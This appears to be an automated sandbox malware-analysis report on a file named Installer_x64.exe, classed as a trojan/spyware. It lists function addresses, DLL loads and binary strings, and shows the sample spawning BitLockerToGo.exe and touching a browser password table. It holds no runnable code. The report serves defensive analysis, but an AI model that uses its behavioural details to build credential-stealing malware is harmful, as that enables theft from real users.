Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9A170	0_3_0BC9A170
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBB170	0_3_0BCBB170
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC99110	0_3_0BC99110
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCAF13B	0_3_0BCAF13B
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA474E	0_3_0BCA474E
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC85770	0_3_0BC85770
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC83730	0_3_0BC83730
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA86F0	0_3_0BCA86F0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBF640	0_3_0BCBF640
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9066B	0_3_0BC9066B
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC96608	0_3_0BC96608
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC35D0	0_3_0BCC35D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCAA548	0_3_0BCAA548
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA1550	0_3_0BCA1550
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9F4E0	0_3_0BC9F4E0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA6400	0_3_0BCA6400
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBDAC0	0_3_0BCBDAC0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9DC00	0_3_0BC9DC00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F84785	3_3_02F84785
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040E8E0	3_2_0040E8E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043C8E0	3_2_0043C8E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00409880	3_2_00409880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040D94E	3_2_0040D94E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00422150	3_2_00422150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004089D0	3_2_004089D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041126B	3_2_0041126B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004292F0	3_2_004292F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443DC0	3_2_00443DC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00444770	3_2_00444770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00426735	3_2_00426735
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00435840	3_2_00435840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00422870	3_2_00422870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00437870	3_2_00437870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00429878	3_2_00429878
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00406800	3_2_00406800
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042A801	3_2_0042A801
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004160CA	3_2_004160CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041A8E0	3_2_0041A8E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004200E0	3_2_004200E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042B0F2	3_2_0042B0F2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041C897	3_2_0041C897
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042C09E	3_2_0042C09E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041B942	3_2_0041B942
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00412950	3_2_00412950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00440950	3_2_00440950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443100	3_2_00443100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004329D2	3_2_004329D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004441D0	3_2_004441D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004269E0	3_2_004269E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00403980	3_2_00403980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00440240	3_2_00440240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041DA10	3_2_0041DA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443220	3_2_00443220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443239	3_2_00443239
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0044323B	3_2_0044323B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00428A90	3_2_00428A90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00442ABD	3_2_00442ABD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042534E	3_2_0042534E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443360	3_2_00443360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00406370	3_2_00406370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00405B10	3_2_00405B10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00404330	3_2_00404330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043DB90	3_2_0043DB90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042C3B4	3_2_0042C3B4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00409440	3_2_00409440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041C897	3_2_0041C897
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042AC23	3_2_0042AC23
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00443420	3_2_00443420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041C430	3_2_0041C430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004354C0	3_2_004354C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004434C0	3_2_004434C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040F480	3_2_0040F480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00444490	3_2_00444490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00411D55	3_2_00411D55
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041AD70	3_2_0041AD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00426D70	3_2_00426D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043BD70	3_2_0043BD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00419D10	3_2_00419D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043DD31	3_2_0043DD31
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042FD3B	3_2_0042FD3B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004075D0	3_2_004075D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040ADE0	3_2_0040ADE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041DDE0	3_2_0041DDE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0041E5F0	3_2_0041E5F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00414D80	3_2_00414D80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004425A0	3_2_004425A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00429E40	3_2_00429E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00430653	3_2_00430653
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00417653	3_2_00417653
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043D650	3_2_0043D650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00437600	3_2_00437600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042B60D	3_2_0042B60D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00434617	3_2_00434617
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00404E30	3_2_00404E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00416ECB	3_2_00416ECB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004326DE	3_2_004326DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00428680	3_2_00428680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0042FE93	3_2_0042FE93
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00418EBB	3_2_00418EBB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00429740	3_2_00429740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00426F40	3_2_00426F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00402F50	3_2_00402F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00422F50	3_2_00422F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00426F51	3_2_00426F51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00430F60	3_2_00430F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00431F11	3_2_00431F11
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00433FC6	3_2_00433FC6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00405FD0	3_2_00405FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0043BFD0	3_2_0043BFD0

Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: String function: 0BC87580 appears 79 times
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: String function: 0BC94170 appears 102 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00414D70 appears 102 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00408180 appears 54 times

Source: Installer_x64.exe, 00000000.00000003.2278330897.000000000B8AA000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Installer_x64.exe

Source: Installer_x64.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Installer_x64.exe	Binary string: lande (la)NtProtectVirtualMemoryNtSetSystemInformationNtWaitForSingleObjectNyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimePlayEnhMetaFile failedPower PC little endianRegisterTypeLibForUserRegisterWindowMessageWRtlDeleteFunctionTableRtlGetNtVersionNumbersRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSesotho Sa Leboa (nso)SetMenuItemInfo failedSetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)Tasmania Standard TimeTotal number of frees.Turkish Turkey (tr-TR)Unsupported Media TypeWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWrong number of octetsWrong unwind opcode %dX-Content-Type-OptionsXXX_InternalExtensionsYiddish World (yi-001)Yoruba Nigeria (yo-NG)\Device\NamedPipe\msys^data:.+\/(.+);base64$address already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad section name indexbad sweepgen in refillbody closed by handlercannot allocate memorycannot unmarshal into compileCallabck: type driver: bad connectionduplicated defer entryduplicatehandle failederror decoding messageerror parsing regexp: error while traversingexpected /> in elementexpected quoted stringframe_data_pad_too_bigfreeIndex is not validgetenv before env initgo_gc_duration_secondsgzip: invalid checksumheadTailIndex overflowhpack: string too longhttp2: frame too largeidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinternal(%p) error: %vinvalid UTF-8 detectedinvalid address familyinvalid number base %dinvalid section offsetinvalid urn prefix: %qjava_string_check_utf8json: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmismatched ELF versionmissing ']' in addressmissing required fieldmultiple :: in addressnetwork is unreachablenon-Go function at pc=notify.FileActionAddedoldoverflow is not niloneof type already setoperation was canceledoverflowing coordinatepe: file reader is nilphp_metadata_namespaceprotocol not availableprotocol not supportedreflect.MapIter.SetKeyreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: global value=runtime: heapReleased=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelsimple_alloc::allocateskipping Question Nameskipping Question Typeslice_not_have_elem_byspan has no free spacestack not a power of 2too many load commandstrace reader (blocked)trace: alloc too largeunexpected length codeunexpected method stepunexpected metric typeunknown internal errorunknown protocol errorunsupported image typewatch: new watch adde
Source: Installer_x64.exe	Binary string: ricaines (les)SetConsoleCursorPositionSetDefaultDllDirectoriesSetStretchBltMode failedSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceSliceType.Cap argument 1SliceType.Len argument 1Spanish Colombia (es-CO)Spanish Honduras (es-HN)Spanish Paraguay (es-PY)Tigrinya Eritrea (ti-ER)Total number of mallocs.Type.Indirect argument 1US Eastern Standard TimeUnRegisterTypeLibForUserVariantTimeToDosDateTimeVirgin Islands (British)WSAAsyncGetProtoByNumberWSAWaitForMultipleEventsWindows boot application\Device\NamedPipe\cygwin
Source: Installer_x64.exe	Binary string: Nyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimePlayEnhMetaFile failedPower PC little endianRegisterTypeLibForUserRegisterWindowMessageWRtlDeleteFunctionTableRtlGetNtVersionNumbersRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSesotho Sa Leboa (nso)SetMenuItemInfo failedSetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)Tasmania Standard TimeTotal number of frees.Turkish Turkey (tr-TR)Unsupported Media TypeWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWrong number of octetsWrong unwind opcode %dX-Content-Type-OptionsXXX_InternalExtensionsYiddish World (yi-001)Yoruba Nigeria (yo-NG)\Device\NamedPipe\msys^data:.+\/(.+);base64$address already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad section name indexbad sweepgen in refillbody closed by handlercannot allocate memorycannot unmarshal into compileCallabck: type driver: bad connectionduplicated defer entryduplicatehandle failederror decoding messageerror parsing regexp: error while traversingexpected /> in elementexpected quoted stringframe_data_pad_too_bigfreeIndex is not validgetenv before env initgo_gc_duration_secondsgzip: invalid checksumheadTailIndex overflowhpack: string too longhttp2: frame too largeidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinternal(%p) error: %vinvalid UTF-8 detectedinvalid address familyinvalid number base %dinvalid section offsetinvalid urn prefix: %qjava_string_check_utf8json: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmismatched ELF versionmissing ']' in addressmissing required fieldmultiple :: in addressnetwork is unreachablenon-Go function at pc=notify.FileActionAddedoldoverflow is not niloneof type already setoperation was canceledoverflowing coordinatepe: file reader is nilphp_metadata_namespaceprotocol not availableprotocol not supportedreflect.MapIter.SetKeyreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: global value=runtime: heapReleased=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelsimple_alloc::allocateskipping Question Nameskipping Question Typeslice_not_have_elem_byspan has no free spacestack not a power of 2too many load commandstrace reader (blocked)trace: alloc too largeunexpected length codeunexpected method stepunexpected metric typeunknown internal errorunknown protocol errorunsupported image typewatch: new watch addedwglRealizeLayerPalettewirep: invalid p statewrite on closed bufferx509: ma

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_0043C8E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043C8E0

Source: Installer_x64.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Installer_x64.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BitLockerToGo.exe, 00000003.00000003.2359738678.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359552260.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2371295370.00000000054BD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359655407.00000000054D0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359738678.00000000054C6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Installer_x64.exe

ReversingLabs: Detection: 13%

Source: Installer_x64.exe	String found in binary or memory: net/addrselect.go
Source: Installer_x64.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
Source: Installer_x64.exe	String found in binary or memory: github.com/lxn/walk@v0.0.0-20210112085537-c389da54e794/stopwatch.go
Source: Installer_x64.exe	String found in binary or memory: github.com/lxn/walk@v0.0.0-20210112085537-c389da54e794/stopwatch.go

Source: C:\Users\user\Desktop\Installer_x64.exe

File read: C:\Users\user\Desktop\Installer_x64.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Installer_x64.exe "C:\Users\user\Desktop\Installer_x64.exe"
Source: C:\Users\user\Desktop\Installer_x64.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\Installer_x64.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
